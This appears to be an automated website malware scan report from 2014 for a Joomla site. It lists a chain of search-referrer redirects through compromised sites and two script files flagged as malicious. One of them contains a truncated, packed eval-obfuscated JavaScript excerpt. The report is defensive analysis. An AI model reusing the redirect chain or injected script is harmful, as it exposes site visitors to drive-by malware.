Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://optical-vision.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: optical-vision.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sat, 12 Jul 2014 19:50:27 GMT Location: http://chilli-recipes.com/administrator/includes/joomla.php Server: Apache Content-Length: 0 Content-Type: text/html | malicious |
URL: http://chilli-recipes.com/administrator/includes/joomla.php (imitation of visitor from search engine) GET /administrator/includes/joomla.php HTTP/1.1 Host: chilli-recipes.com Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 12 Jul 2014 19:50:29 GMT Location: http://www.haphuongfoundation.net/vietnam/language/pdf_fonts/www/all2.php Server: Apache/2.4.9 (Unix) Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.2.17 | malicious |
URL: http://www.haphuongfoundation.net/vietnam/language/pdf_fonts/www/all2.php (imitation of visitor from search engine) GET /vietnam/language/pdf_fonts/www/all2.php HTTP/1.1 Host: www.haphuongfoundation.net Referer: http://www.google.com/search?q=redirect+check3 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 12 Jul 2014 19:50:29 GMT Location: http://it-rise.ru/includes/domit/1.php Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html | malicious |
Scanned pages/files
Request | Server response | Status |
http://optical-vision.com/ | 200 OK Content-Length: 53096 Content-Type: text/html | clean |
http://www.optical-vision.com/templates/ja_helio/js/global.js | 200 OK Content-Length: 2695 Content-Type: application/javascript | clean |
http://www.optical-vision.com/templates/ja_helio/js/swfobject.js | 200 OK Content-Length: 7858 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof deconcept == "undefined") var deconcept = new Object(); if(typeof deconcept.util == "undefined") deconcept.util = new Object(); if(typeof deconcept.SWFObjectUtil == "undefined") deconcept.SWFObjectUtil = new Object(); deconcept.SWFObject = function(swf, id, w, h, ver, c, wmode, useExpressInstall, quality, xiRedirectUrl, redirectUrl, detectKey){ if (!document.createElement || !document.getElementById) { return; } this.DETECT_KEY = detectKey ? detectKey : 'detectfla if (q.length > 1 && startIndex > -1) { return q.substring(q.indexOf("=", startIndex)+1, endIndex); } } return ""; } } if (Array.prototype.push == null) { Array.prototype.push = function(item) { this[this.length] = item; return this.length; }} var getQueryParamValue = deconcept.util.getRequestParameter; var FlashObject = deconcept.SWFObject; var SWFObject = deconcept.SWFObject; Antivirus reports:
| ||
http://optical-vision.com/modules/mod_yoo_slider/mod_yoo_slider.js | 200 OK Content-Length: 1728 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('c u=t T({R:5(7,4,2){0.W({q:\'n\',6:\'D\',a:Y,b:X,h:L,f:x.M.N.K},2);0.7=$(7);0.4=$$(4);0.k=t x.P(0.4,{J:G,I:H,f:0.2.f});8(0.2.q!=\'n\')0.2.6=\'z\';0.2.a=O.11(0.2.b-( Antivirus reports:
| ||
http://optical-vision.com/plugins/system/pc_includes/ajax.js | 200 OK Content-Length: 7115 Content-Type: application/javascript | clean |
http://www.optical-vision.com/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/themes/default&file[0]=theme.js&subdir[1]=/js&file[1]=sleight.js&subdir[2]=/js/mootools&file[2]=mootools-release-1.11.js&subdir[3]=/js/mootools&file[3]=mooPrompt.js | 200 OK Content-Length: 56052 Content-Type: text/javascript | clean |
http://optical-vision.com/templates/ja_helio/js/ja.script.js | 200 OK Content-Length: 6352 Content-Type: application/javascript | clean |
http://optical-vision.com/templates/ja_helio/ja_menus/ja_moomenu/ja.moomenu.js | 200 OK Content-Length: 5298 Content-Type: application/javascript | clean |
http://www.optical-vision.com/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/js&file[0]=wz_tooltip.js | 200 OK Content-Length: 35310 Content-Type: text/javascript | clean |
http://www.optical-vision.com/modules/mod_virtuemart/vm_transmenu/transmenu.js | 200 OK Content-Length: 33566 Content-Type: application/javascript | clean |
http://optical-vision.com/index.php?option=com_content&view=article&id=52&Itemid=53 | 200 OK Content-Length: 35123 Content-Type: text/html | clean |
http://optical-vision.com/media/system/js/caption.js | 200 OK Content-Length: 1721 Content-Type: application/javascript | clean |
http://optical-vision.com/plugins/content/ja_tabs/ja_tabs.js | 200 OK Content-Length: 6704 Content-Type: application/javascript | clean |
http://optical-vision.com/index.php?option=com_content&view=article&id=53&Itemid=54 | 200 OK Content-Length: 34196 Content-Type: text/html | clean |
http://optical-vision.com/index.php?option=com_contact&view=contact&id=1&Itemid=55 | 200 OK Content-Length: 36415 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=optical-vision.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://optical-vision.com/
Result: optical-vision.com is not infected or malware details are not published yet.
Result: optical-vision.com is not infected or malware details are not published yet.